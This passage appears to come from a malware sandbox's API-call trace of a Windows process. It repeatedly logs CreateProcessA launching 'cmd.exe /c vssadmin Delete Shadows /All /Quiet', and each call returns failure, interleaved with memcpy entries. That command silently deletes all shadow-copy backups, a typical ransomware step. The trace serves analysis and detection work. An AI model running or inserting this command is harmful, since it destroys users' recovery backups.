vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.369] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.369] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.370] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.370] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.371] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.371] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.372] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.372] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.372] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.372] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.372] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.372] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.372] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.372] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.372] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.372] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, 